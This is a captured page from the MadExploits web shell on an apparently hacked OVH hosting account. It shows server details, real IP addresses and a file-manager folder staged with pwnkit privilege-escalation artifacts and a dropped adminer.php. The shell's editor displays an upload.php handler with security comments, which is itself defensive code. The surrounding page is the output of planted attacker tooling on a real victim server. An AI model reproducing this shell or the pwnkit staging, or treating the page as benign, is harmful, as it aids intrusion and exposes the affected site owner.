Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
/
home /
alinaousgg /
garmin /
admin0504 /
filemanager /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwx---r-x
css
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
include
[ DIR ]
drwx---r-x
jPlayer
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
lang
[ DIR ]
drwx---r-x
uploader
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
LICENSE
289
B
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
ajax_calls.php
9.39
KB
-rw----r--
dialog.php
42.6
KB
-rw----r--
execute.php
9.14
KB
-rw----r--
force_download.php
806
B
-rw----r--
index.php
1.29
KB
-rw----r--
plugin.js
1.8
KB
-rw----r--
plugin.min.js
1.3
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
upload.php
5.89
KB
-rw----r--
Code Editor : upload.php
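<?php
/**
 * Upload endpoint of the file manager.
 *
 * Flow: check the session gate, build the target and thumbnail directories
 * from client-supplied sub-paths, load the nearest folder-level config.php,
 * validate the uploaded file against the extension and MIME allow-lists,
 * store it, and (for images) create thumbnails and apply resize limits.
 *
 * $current_path, $thumbs_base_path, $ext, $mime, $ext_img, $transliteration
 * and the $image_* / $relative_* / $fixed_* settings are not defined in this
 * file; presumably they come from config/config.php -- confirm there.
 *
 * Responses: die('Forbidden'), die('wrong path'), HTTP 405 when no file was
 * sent, HTTP 406 for a rejected file or a failed image step, HTTP 500 when
 * the file cannot be stored, and a redirect to dialog.php on form submit.
 */
include 'config/config.php';

// isset() plus strict comparison: a missing or non-string session value must
// never satisfy the gate through PHP's loose comparison rules.
if (!isset($_SESSION['verify']) || $_SESSION['verify'] !== 'RESPONSIVEfilemanager') {
    die('Forbidden');
}

include 'include/utils.php';

// The sub-paths are attacker-controllable request data. Reject non-string
// values (e.g. arrays) outright instead of letting them be string-converted.
$requested_path = isset($_POST['path']) ? $_POST['path'] : '';
$requested_thumb_path = isset($_POST['path_thumb']) ? $_POST['path_thumb'] : '';
if (!is_string($requested_path) || !is_string($requested_thumb_path)) {
    die('wrong path');
}

// Strip NUL bytes and anchor both paths under the configured base folders.
// The values are written back to $_POST as the original code did.
$_POST['path'] = $current_path.str_replace("\0", '', $requested_path);
$_POST['path_thumb'] = $thumbs_base_path.str_replace("\0", '', $requested_thumb_path);

$storeFolder = $_POST['path'];
$storeFolderThumb = $_POST['path_thumb'];

// The base folder must be the leading component (position 0), and neither
// path may contain a "./" or "../" style segment.
// NOTE(review): this is a pattern check only; it does not resolve symlinks.
// A realpath()-based containment check would be stronger -- confirm whether
// the upload tree may contain symlinks before relying on this.
$path_pos = strpos($storeFolder, $current_path);
$thumb_pos = strpos($storeFolderThumb, $thumbs_base_path);
if ($path_pos !== 0
    || $thumb_pos !== 0
    || preg_match('/\.{1,2}[\/|\\\]/', $storeFolderThumb) !== 0
    || preg_match('/\.{1,2}[\/|\\\]/', $storeFolder) !== 0
) {
    die('wrong path');
}

// Walk from the target folder up towards $current_path and load the first
// folder-level config.php found (bounded to 50 levels).
// SECURITY: require_once executes whatever config.php exists inside the
// upload tree, so the extension allow-list must never admit PHP files and
// the upload folders must not be writable through any other channel.
$path = $storeFolder;
$cycle = true;
$max_cycles = 50;
$level = 0;
while ($cycle && $level < $max_cycles) {
    $level++;
    if ($path == $current_path) {
        $cycle = false;
    }
    if (file_exists($path.'config.php')) {
        require_once $path.'config.php';
        $cycle = false;
    }
    $path = fix_dirname($path).'/';
}

if (!empty($_FILES) && isset($_FILES['file']) && $_FILES['file']['size']) {
    $info = pathinfo($_FILES['file']['name']);

    // Both the extension and the sniffed MIME type must be on the allow-list.
    // Strict in_array(): a false from mime_content_type() or a numeric-looking
    // string can never match through loose comparison.
    if (isset($info['extension'])
        && in_array(fix_strtolower($info['extension']), $ext, true)
        && in_array(mime_content_type($_FILES['file']['tmp_name']), $mime, true)
    ) {
        $tempFile = $_FILES['file']['tmp_name'];
        $targetPath = $storeFolder;
        $targetPathThumb = $storeFolderThumb;

        // Normalise the name and collapse inner dots to '-', so only the
        // final, validated extension remains in the stored file name.
        $_FILES['file']['name'] = fix_filename($_FILES['file']['name'], $transliteration);
        $file_name_splitted = explode('.', $_FILES['file']['name']);
        array_pop($file_name_splitted);
        $_FILES['file']['name'] = implode('-', $file_name_splitted).'.'.$info['extension'];

        // Never overwrite an existing file: append _1, _2, ... instead.
        if (file_exists($targetPath.$_FILES['file']['name'])) {
            $suffix = 1;
            $info = pathinfo($_FILES['file']['name']);
            while (file_exists($targetPath.$info['filename'].'_'.$suffix.'.'.$info['extension'])) {
                $suffix++;
            }
            $_FILES['file']['name'] = $info['filename'].'_'.$suffix.'.'.$info['extension'];
        }

        $targetFile = $targetPath.$_FILES['file']['name'];
        $targetFileThumb = $targetPathThumb.$_FILES['file']['name'];

        $is_img = in_array(fix_strtolower($info['extension']), $ext_img)
            && @getimagesize($tempFile) != false;

        // Stop if the file cannot be stored; the original ignored this result
        // and went on to chmod and process a file that did not exist.
        if (!move_uploaded_file($tempFile, $targetFile)) {
            header('HTTP/1.1 500 Internal Server Error', true, 500);
            exit();
        }
        // Uploaded content is data: no execute bit (was 0755).
        chmod($targetFile, 0644);

        if ($is_img) {
            // Fixed: both failure branches used to assign false, so the
            // cleanup below was unreachable and a file whose thumbnail step
            // failed stayed on disk.
            $memory_error = false;
            if (!create_img_gd($targetFile, $targetFileThumb, 122, 91)) {
                $memory_error = true;
            } elseif (!new_thumbnails_creation($targetPath, $targetFile, $_FILES['file']['name'], $current_path, $relative_image_creation, $relative_path_from_current_pos, $relative_image_creation_name_to_prepend, $relative_image_creation_name_to_append, $relative_image_creation_width, $relative_image_creation_height, $fixed_image_creation, $fixed_path_from_filemanager, $fixed_image_creation_name_to_prepend, $fixed_image_creation_to_append, $fixed_image_creation_width, $fixed_image_creation_height)) {
                $memory_error = true;
            } else {
                $imginfo = getimagesize($targetFile);
                $srcWidth = $imginfo[0];
                $srcHeight = $imginfo[1];

                // Optional forced resize; a 0 dimension means "keep the
                // aspect ratio", and 0/0 means "keep the original size".
                if ($image_resizing) {
                    if ($image_resizing_width == 0) {
                        if ($image_resizing_height == 0) {
                            $image_resizing_width = $srcWidth;
                            $image_resizing_height = $srcHeight;
                        } else {
                            $image_resizing_width = $image_resizing_height * $srcWidth / $srcHeight;
                        }
                    } elseif ($image_resizing_height == 0) {
                        $image_resizing_height = $image_resizing_width * $srcHeight / $srcWidth;
                    }
                    $srcWidth = $image_resizing_width;
                    $srcHeight = $image_resizing_height;
                    create_img_gd($targetFile, $targetFile, $image_resizing_width, $image_resizing_height);
                }

                // Max resizing limit control (0 disables a limit).
                $resize = false;
                if ($image_max_width != 0 && $srcWidth > $image_max_width) {
                    $resize = true;
                    $srcHeight = $image_max_width * $srcHeight / $srcWidth;
                    $srcWidth = $image_max_width;
                }
                if ($image_max_height != 0 && $srcHeight > $image_max_height) {
                    $resize = true;
                    $srcWidth = $image_max_height * $srcWidth / $srcHeight;
                    $srcHeight = $image_max_height;
                }
                if ($resize) {
                    create_img_gd($targetFile, $targetFile, $srcWidth, $srcHeight);
                }
            }

            if ($memory_error) {
                // Remove the stored file so a failed image step leaves nothing behind.
                unlink($targetFile);
                header('HTTP/1.1 406 Not enought Memory', true, 406);
                exit();
            }
        }
    } else {
        header('HTTP/1.1 406 file not permitted', true, 406);
        exit();
    }
} else {
    header('HTTP/1.1 405 Bad Request', true, 405);
    exit();
}

if (isset($_POST['submit'])) {
    // Only forward fields that were actually sent; http_build_query()
    // URL-encodes the values, so they cannot break out of the query string.
    $redirect_params = array();
    foreach (array('type', 'lang', 'popup', 'field_id', 'fldr') as $field) {
        if (isset($_POST[$field])) {
            $redirect_params[$field] = $_POST[$field];
        }
    }
    header('location: dialog.php?'.http_build_query($redirect_params));
    exit();
}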